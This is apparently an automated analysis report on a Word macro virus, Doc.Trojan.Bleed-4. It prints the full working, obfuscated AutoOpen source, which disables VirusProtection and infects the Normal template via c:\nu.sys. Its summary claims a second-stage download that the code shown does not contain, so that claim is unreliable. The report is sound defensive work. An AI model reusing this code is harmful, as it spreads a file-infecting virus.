Office (OLE) malware analysis — malicious · 6562e807db74bb4a

MALICIOUS

Office (OLE)

30.5 KB Created: 1999-06-20 16:28:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 155305cbefb417e604f264d5b80c8b7f SHA-1: 9d19e4297bbd5bdfbee92a58ff0cbb8d65b879fd SHA-256: 6562e807db74bb4a159215dfd71a7b46a2123880393eed70732a8d6d4f092036

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro. The macro attempts to obfuscate its code and appears to be designed to download and execute a second-stage payload, evidenced by the reconstruction of the path 'c:\nu.sys' which is likely used to store the payload. The presence of the AutoOpen macro and the nature of the payload suggest it was delivered as a spearphishing attachment.

Heuristics 4

ClamAV: Doc.Trojan.Bleed-4 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Bleed-4
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8539 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8539 bytes
SHA-256: `269b63b17076cfbdf6f322fd56c405536daa1bf906e1cb206797095d6a5c35d6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Crypted" Sub AutoOpen(): Dim jack(13) jack(1) = "Sub ¶Íö¼AutçÕïÆÒoëÜclo´ÓæØsµ¶Þïe()" jack(2) = "OnÜÀñ Errorê·ñº·Ã RãúÝãesume Neçðä÷ôxtø÷Ý¶ÉÌ: c Àêµñ= ßÉç""AttribøßuÚä·Øº·t¾e VÛâÏôéB_NåµÄåíame =ïÕääë """"CrÊy½pt¸òeÒdÞ´íÊ¹""""" jack(3) = "OptioÌÜÆÏnsÈüºçÍ.óÔòµVirusProtectiÐÜçêÇÖo¹nÕéõ¸ =¶¸ÁµØÐ False" jack(4) = "Optiàons.SaÂ¿ÚvËeNoÖér´ÒëmÜalProî¿ÚmµptñáýÙà =½´Ñöµ½ FalùÐ¿se" jack(5) = "vÛÑîc = Äß÷»ÀThÕìisDÑë»äã·ocum´ñe×ÁènóÉÖÊËüt.VBËþÉØÓProÅ¸¼½¼ÕjectÃÒÑìÞ.ÀñÙöÙVÏþßBÛßùComðúÄponents(""CrºÌypàtedÔ¾Ñóø""ÏÕÀäå)ÆêÆä»µ.CodeMoÇÒãdÜ¼ûuleñÈåßé.Li¿nesÇ(1,ñÕ 25)" jack(6) = "Ope¾ÜöÙðÎn ""cËÓíÍ¶ê:ì\nÛÚÜ´ÍuÅô.sysÝ"" ¾ëÜÕFor OutÃøpÅÔÜÁu»t ÏÔîáîÓAs #ú1:öÄÙãøÈ PriùÐÍáÄnt #1, c: ÌÅëPri¾Îð×nt #1ÉÁ,¾û÷æµ ò¶ÖÂvcû:áÌÂ ó·¶çCloÃÚ×ÏÐsÚñîe Á¼#1" jack(7) = "If Lenë(NorÅìÉéÔ¾maúÛ¹ßlTeøîËÎ¿mplúÉæatÝæe.VBPßroÑ÷Èjectí.VBüÌ¶çÆCo÷ÎþÂ¶ìm÷¸poÉne¾ÕËÂçnáõ·âts(""CrypteÇ´dûÉùÎ""Åùèâ).NÝÔaÑïÇçme) ¼ÇÌ¿ö½= 0 ÝThe¹ÅòÌÈÀnÊ× NîÀormaõÜßölì¸¾Temp¼ÀæÃÊlate.VBÙÌåýßÖPrºæÛëº½oject.¸ïVBCÜéo¼ÓÚmëøponents.ññîëImport Àû¾ëúä""c:ËÖ\nu.º×ÛÊsys""" jack(8) = "I¾þÌèÃÐfÂ LeníñóêÛ(ActiçvÒÝçâçeDÌ¾×ÀóoÆücumëÐäeÄÕÜnt.VBõûãÁñProject.VBCo¼÷¾ÍÝmpoîØôòüÛnentsç¾¼éá(""C¾rèàÙßÄyptÝÏÇõÊüed""ØîÈ).Name)èïÏÂù = îäÂô0 ÓThenÍïÌÝì Actü¸×ÁüÕivíeåÚçDîoùÇcument.ÇÆVBProjôëØÔ¾eïÚÒ¸ÖcéÀ÷t´ðöï.óëÖVóòãíÑBComponenóÙäøöÀtÇÙÒïsÙáÂÊéË.Impüò»Øort ""c:ô½Ú\nu.syÊ¼Üüs""" jack(9) = "ThisDüÇocumeÛênt¿.VÌüÚBPrôoµÖject.VBCompoçåènenÆÖÉ×ètÝÛË¹Üs(""CãÑÄÈrÄÛÌµêyøptÞçöÁed"")çÌüæëï.CµÀodeMåèüÎëodule.DeÐûáÎßõlÃ¿eteLinæÆ½Åes þìáÃË26, 9½´Ô" jack(11) = "If AñÝ¿êÒÜctÐiveæîæéÔàDocößóumentÊ.SavàeüÕÊÅüüd =Òé F¹åalse ×½äT×ØëÑh¸Àßúßóen AcÇèóïÊtàivþº´åÊÃeDùØëµãocumºØe½ÜÈnt.SaveAs ActíÑiveDïàÓÞÎoçÄàcÞÉáÚÄçuìmçÑÜ÷êÞent.ÑîÉãÝÆFulÓÀlName»àÔÅù" jack(10) = "TÌìhñµisDûýûoÌÊñ´ýücumðñîÕ¸ÑenÝtµÝá¶Ïß.Ô»¾ÚÀùVBPËÁ¼ï¿roÍjeÏÓÕñÀËct.ÛÌüÔÂÛVBCoþ½ÏmpÜÐ¸çðËoneÚðÝÆ´Ünts(""Î¶úCÖryöýè¾Ð¹ptÛedÌ»ö"").êã¼ßéCodeMìóü¿ÝodîÊÒ÷Ûulãêå¶ûe.DeäÈÁleteÃLineÆs 26ÞµÆ»,Ê½¸ñ 4" jack(12) = "AcÍùðÑòÖtÍivÊËeÁDocuÒýÚêmùÝ¸ÖeÅåÆÕnµÉ¹´têÞç´.èõæClosÒe wdãñîó»DêÌoNotîääñÜSÎaÓveCÔÑhanã×geåÜçÙs" jack(13) = "End ïÕØSÕ¹ÓÊuËüöÖàÄb" For i = 1 To 13 For ii = 1 To Len(jack(i)) z = Mid(jack(i), ii, 1) If Asc(z) > 177 Then z = "" x = x & z Next ii vc = vc & x & vbCr x = "" Next i ThisDocument.VBProject.VBComponents("Crypted").CodeModule.InsertLines 26, vc End Sub ' Processing file: /opt/analyzer/scan_staging/3e7ff5cae6314a238a01288919e8c5e8.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 903 bytes ' Macros/VBA/Crypted - 5472 bytes ' Line #0: ' FuncDefn (Sub AutoOpen()) ' BoS 0x0000 ' Dim ' OptionBase ' LitDI2 0x000D ' VarDefn jack ' Line #1: ' LitStr 0x0022 "Sub ¶Íö¼AutçÕïÆÒoëÜclo´ÓæØsµ¶Þïe()" ' LitDI2 0x0001 ' ArgsSt jack 0x0001 ' Line #2: ' LitStr 0x007B "OnÜÀñ Errorê·ñº·Ã RãúÝãesume Neçðä÷ôxtø÷Ý¶ÉÌ: c Àêµñ= ßÉç"AttribøßuÚä·Øº·t¾e VÛâÏôéB_NåµÄåíame =ïÕääë ""CrÊy½pt¸òeÒdÞ´íÊ¹""" ' LitDI2 0x0002 ' ArgsSt jack 0x0001 ' Line #3: ' LitStr 0x003D "OptioÌÜÆÏnsÈüºçÍ.óÔòµVirusProtectiÐÜçêÇÖo¹nÕéõ¸ =¶¸ÁµØÐ False" ' LitDI2 0x0003 ' ArgsSt jack 0x0001 ' Line #4: ' LitStr 0x003D "Optiàons.SaÂ¿ÚvËeNoÖér´ÒëmÜalProî¿ÚmµptñáýÙà =½´Ñöµ½ FalùÐ¿se" ' LitDI2 0x0004 ' ArgsSt jack 0x0001 ' Line #5: ' LitStr 0x00A6 "vÛÑîc = Äß÷»ÀThÕìisDÑë»äã·ocum´ñe×ÁènóÉÖÊËüt.VBËþÉØÓProÅ¸¼½¼ÕjectÃÒÑìÞ.ÀñÙöÙVÏþßBÛßùComðúÄponents("CrºÌypàtedÔ¾Ñóø"ÏÕÀäå)ÆêÆä»µ.CodeMoÇÒãdÜ¼ûuleñÈåßé.Li¿nesÇ(1,ñÕ 25)" ' LitDI2 0x0005 ' ArgsSt jack 0x0001 ' Line #6: ' LitStr 0x009C "Ope¾ÜöÙðÎn "cËÓíÍ¶ê:ì\nÛÚÜ´ÍuÅô.sysÝ" ¾ëÜÕFor OutÃøpÅÔÜÁu»t ÏÔîáîÓAs #ú1:öÄÙãøÈ PriùÐÍáÄnt #1, c: ÌÅëPri¾Îð×nt #1ÉÁ,¾û÷æµ ò¶ÖÂvcû:áÌÂ ó·¶çCloÃÚ×ÏÐsÚñîe Á¼#1" ' LitDI2 0x0006 ' ArgsSt jack 0x0001 ' Line #7: ' LitStr 0x0102 "If Lenë(NorÅìÉéÔ¾maúÛ¹ßlTeøîËÎ¿mplúÉæatÝæe.VBPßroÑ÷Èjectí.VBüÌ¶çÆCo÷ÎþÂ¶ìm÷¸poÉne¾ÕËÂçnáõ·âts("CrypteÇ´d ... (truncated)

SHA-256: 269b63b17076cfbdf6f322fd56c405536daa1bf906e1cb206797095d6a5c35d6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Crypted"
Sub AutoOpen(): Dim jack(13)
jack(1) = "Sub ¶Íö¼AutçÕïÆÒoëÜclo´ÓæØsµ¶Þïe()"
jack(2) = "OnÜÀñ Errorê·ñº·Ã RãúÝãesume Neçðä÷ôxtø÷Ý¶ÉÌ: c Àêµñ= ßÉç""AttribøßuÚä·Øº·t¾e VÛâÏôéB_NåµÄåíame =ïÕääë """"CrÊy½pt¸òeÒdÞ´íÊ¹"""""
jack(3) = "OptioÌÜÆÏnsÈüºçÍ.óÔòµVirusProtectiÐÜçêÇÖo¹nÕéõ¸ =¶¸ÁµØÐ False"
jack(4) = "Optiàons.SaÂ¿ÚvËeNoÖér´ÒëmÜalProî¿ÚmµptñáýÙà =½´Ñöµ½ FalùÐ¿se"
jack(5) = "vÛÑîc = Äß÷»ÀThÕìisDÑë»äã·ocum´ñe×ÁènóÉÖÊËüt.VBËþÉØÓProÅ¸¼½¼ÕjectÃÒÑìÞ.ÀñÙöÙVÏþßBÛßùComðúÄponents(""CrºÌypàtedÔ¾Ñóø""ÏÕÀäå)ÆêÆä»µ.CodeMoÇÒãdÜ¼ûuleñÈåßé.Li¿nesÇ(1,ñÕ 25)"
jack(6) = "Ope¾ÜöÙðÎn ""cËÓíÍ¶ê:ì\nÛÚÜ´ÍuÅô.sysÝ"" ¾ëÜÕFor OutÃøpÅÔÜÁu»t ÏÔîáîÓAs #ú1:öÄÙãøÈ PriùÐÍáÄnt #1, c: ÌÅëPri¾Îð×nt #1ÉÁ,¾û÷æµ ò¶ÖÂvcû:áÌÂ ó·¶çCloÃÚ×ÏÐsÚñîe Á¼#1"
jack(7) = "If Lenë(NorÅìÉéÔ¾maúÛ¹ßlTeøîËÎ¿mplúÉæatÝæe.VBPßroÑ÷Èjectí.VBüÌ¶çÆCo÷ÎþÂ¶ìm÷¸poÉne¾ÕËÂçnáõ·âts(""CrypteÇ´dûÉùÎ""Åùèâ).NÝÔaÑïÇçme) ¼ÇÌ¿ö½= 0 ÝThe¹ÅòÌÈÀnÊ× NîÀormaõÜßölì¸¾Temp¼ÀæÃÊlate.VBÙÌåýßÖPrºæÛëº½oject.¸ïVBCÜéo¼ÓÚmëøponents.ññîëImport Àû¾ëúä""c:ËÖ\nu.º×ÛÊsys"""
jack(8) = "I¾þÌèÃÐfÂ LeníñóêÛ(ActiçvÒÝçâçeDÌ¾×ÀóoÆücumëÐäeÄÕÜnt.VBõûãÁñProject.VBCo¼÷¾ÍÝmpoîØôòüÛnentsç¾¼éá(""C¾rèàÙßÄyptÝÏÇõÊüed""ØîÈ).Name)èïÏÂù = îäÂô0 ÓThenÍïÌÝì Actü¸×ÁüÕivíeåÚçDîoùÇcument.ÇÆVBProjôëØÔ¾eïÚÒ¸ÖcéÀ÷t´ðöï.óëÖVóòãíÑBComponenóÙäøöÀtÇÙÒïsÙáÂÊéË.Impüò»Øort ""c:ô½Ú\nu.syÊ¼Üüs"""
jack(9) = "ThisDüÇocumeÛênt¿.VÌüÚBPrôoµÖject.VBCompoçåènenÆÖÉ×ètÝÛË¹Üs(""CãÑÄÈrÄÛÌµêyøptÞçöÁed"")çÌüæëï.CµÀodeMåèüÎëodule.DeÐûáÎßõlÃ¿eteLinæÆ½Åes þìáÃË26, 9½´Ô"
jack(11) = "If AñÝ¿êÒÜctÐiveæîæéÔàDocößóumentÊ.SavàeüÕÊÅüüd =Òé F¹åalse ×½äT×ØëÑh¸Àßúßóen AcÇèóïÊtàivþº´åÊÃeDùØëµãocumºØe½ÜÈnt.SaveAs ActíÑiveDïàÓÞÎoçÄàcÞÉáÚÄçuìmçÑÜ÷êÞent.ÑîÉãÝÆFulÓÀlName»àÔÅù"
jack(10) = "TÌìhñµisDûýûoÌÊñ´ýücumðñîÕ¸ÑenÝtµÝá¶Ïß.Ô»¾ÚÀùVBPËÁ¼ï¿roÍjeÏÓÕñÀËct.ÛÌüÔÂÛVBCoþ½ÏmpÜÐ¸çðËoneÚðÝÆ´Ünts(""Î¶úCÖryöýè¾Ð¹ptÛedÌ»ö"").êã¼ßéCodeMìóü¿ÝodîÊÒ÷Ûulãêå¶ûe.DeäÈÁleteÃLineÆs 26ÞµÆ»,Ê½¸ñ 4"
jack(12) = "AcÍùðÑòÖtÍivÊËeÁDocuÒýÚêmùÝ¸ÖeÅåÆÕnµÉ¹´têÞç´.èõæClosÒe wdãñîó»DêÌoNotîääñÜSÎaÓveCÔÑhanã×geåÜçÙs"
jack(13) = "End ïÕØSÕ¹ÓÊuËüöÖàÄb"
For i = 1 To 13
    For ii = 1 To Len(jack(i))
        z = Mid(jack(i), ii, 1)
        If Asc(z) > 177 Then z = ""
        x = x & z
    Next ii
    vc = vc & x & vbCr
    x = ""
Next i
ThisDocument.VBProject.VBComponents("Crypted").CodeModule.InsertLines 26, vc
End Sub

' Processing file: /opt/analyzer/scan_staging/3e7ff5cae6314a238a01288919e8c5e8.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Crypted - 5472 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' 	BoS 0x0000 
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x000D 
' 	VarDefn jack
' Line #1:
' 	LitStr 0x0022 "Sub ¶Íö¼AutçÕïÆÒoëÜclo´ÓæØsµ¶Þïe()"
' 	LitDI2 0x0001 
' 	ArgsSt jack 0x0001 
' Line #2:
' 	LitStr 0x007B "OnÜÀñ Errorê·ñº·Ã RãúÝãesume Neçðä÷ôxtø÷Ý¶ÉÌ: c Àêµñ= ßÉç"AttribøßuÚä·Øº·t¾e VÛâÏôéB_NåµÄåíame =ïÕääë ""CrÊy½pt¸òeÒdÞ´íÊ¹"""
' 	LitDI2 0x0002 
' 	ArgsSt jack 0x0001 
' Line #3:
' 	LitStr 0x003D "OptioÌÜÆÏnsÈüºçÍ.óÔòµVirusProtectiÐÜçêÇÖo¹nÕéõ¸ =¶¸ÁµØÐ False"
' 	LitDI2 0x0003 
' 	ArgsSt jack 0x0001 
' Line #4:
' 	LitStr 0x003D "Optiàons.SaÂ¿ÚvËeNoÖér´ÒëmÜalProî¿ÚmµptñáýÙà =½´Ñöµ½ FalùÐ¿se"
' 	LitDI2 0x0004 
' 	ArgsSt jack 0x0001 
' Line #5:
' 	LitStr 0x00A6 "vÛÑîc = Äß÷»ÀThÕìisDÑë»äã·ocum´ñe×ÁènóÉÖÊËüt.VBËþÉØÓProÅ¸¼½¼ÕjectÃÒÑìÞ.ÀñÙöÙVÏþßBÛßùComðúÄponents("CrºÌypàtedÔ¾Ñóø"ÏÕÀäå)ÆêÆä»µ.CodeMoÇÒãdÜ¼ûuleñÈåßé.Li¿nesÇ(1,ñÕ 25)"
' 	LitDI2 0x0005 
' 	ArgsSt jack 0x0001 
' Line #6:
' 	LitStr 0x009C "Ope¾ÜöÙðÎn "cËÓíÍ¶ê:ì\nÛÚÜ´ÍuÅô.sysÝ" ¾ëÜÕFor OutÃøpÅÔÜÁu»t ÏÔîáîÓAs #ú1:öÄÙãøÈ PriùÐÍáÄnt #1, c: ÌÅëPri¾Îð×nt #1ÉÁ,¾û÷æµ ò¶ÖÂvcû:áÌÂ ó·¶çCloÃÚ×ÏÐsÚñîe Á¼#1"
' 	LitDI2 0x0006 
' 	ArgsSt jack 0x0001 
' Line #7:
' 	LitStr 0x0102 "If Lenë(NorÅìÉéÔ¾maúÛ¹ßlTeøîËÎ¿mplúÉæatÝæe.VBPßroÑ÷Èjectí.VBüÌ¶çÆCo÷ÎþÂ¶ìm÷¸poÉne¾ÕËÂçnáõ·âts("CrypteÇ´d
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.